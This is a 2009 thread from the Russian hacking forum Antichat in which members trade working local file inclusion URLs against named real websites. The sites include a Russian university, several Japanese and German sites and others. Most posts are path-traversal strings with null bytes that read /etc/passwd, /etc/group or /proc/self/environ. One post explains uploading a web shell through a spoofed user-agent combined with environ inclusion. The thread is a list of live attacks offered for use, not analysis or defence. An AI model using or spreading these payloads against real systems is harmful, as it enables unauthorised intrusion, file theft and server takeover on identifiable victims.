HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #941  
Старый 13.08.2009, 17:26
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Код:
http://www.halalapalooza.com/d.php?id=[LFI]
 
Ответить с цитированием

  #942  
Старый 14.08.2009, 16:08
pi7dets
Новичок
Регистрация: 14.08.2009
Сообщений: 1
Провел на форуме:
10366

Репутация: 5
По умолчанию

Код:
http://www.ksu.ru/f9/k2/new/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00
PR7, тИЦ 2100
 
Ответить с цитированием

  #943  
Старый 15.08.2009, 18:43
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Пхп-инъекция на сайте aphorism-list.com с возможностью залить шелл.

http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../proc/self/environ%00

Шел без проблем льется при подмене user-agent и инклудом /proc/self/environ (кто читал последнего хакера точно поймет)

Кстати, на хостинге лежит дистрибутив windows xp sp3)

И еще, подскажите, почему не всегда можно заинклудить /proc/self/environ (естественно системы никсовые)? Прав не хватает?
 
Ответить с цитированием

  #944  
Старый 15.08.2009, 22:37
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

http://www.leonardo-co.com/index.php?folder=Career&page=../../../../../../../../../../etc/passwd
http://www.bonnarealty.com/home.php?inc=../../../../../../../../etc/passwd
 
Ответить с цитированием

  #945  
Старый 16.08.2009, 16:15
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

http://www.tallinnamerepaevad.ee/est.php?page=../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #946  
Старый 16.08.2009, 20:28
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Код:
http://stanleycup.crash.sk/sc.php?id=[LFI]
Код:
http://www.dalcomstechnologies.com/pricing.php?id=[LFI]
 
Ответить с цитированием

  #947  
Старый 17.08.2009, 14:22
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

http://www.pillows.jp/20th/p/index.php?page=../../../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #948  
Старый 18.08.2009, 00:43
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Инъекции на 2ух японских сайтах

http://www.holos.jp/index.php?page=../../../../../../../../../../../../../../../../../../../../../../etc/group

http://mobasp.jp/page.php?cat=../../../../../../../../../../../../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #949  
Старый 19.08.2009, 12:09
5rap
Banned
Регистрация: 27.06.2009
Сообщений: 82
Провел на форуме:
437097

Репутация: 117
По умолчанию

Опять решил полазить поискать php inj:

http://www.fitnessmanager.ru/index.php?page=../../../../../../../etc/passwd

Последний раз редактировалось jokester; 19.08.2009 в 12:16.. Причина: Вывод passwd увидел только тут, остальные ндоделанные\без инъекции
 
Ответить с цитированием

  #950  
Старый 20.08.2009, 14:41
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
По умолчанию

Код:
http://www.handballneuchatel.ch/httpdocs/index.php?inc=../../../etc/passwd%00
Код:
http://www.robotsandbotanics.de/index.php?inc=../../../../../../../../etc/passwd%00
Код:
http://www.tasteone-medientechnik.de/index.php?inc=../../../../../../../etc/passwd%00
Код:
http://www.haldergmbh.de/index.php?inc=/etc/passwd
Код:
http://blesk.issa.cz/index.php?inc=index.php%00
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.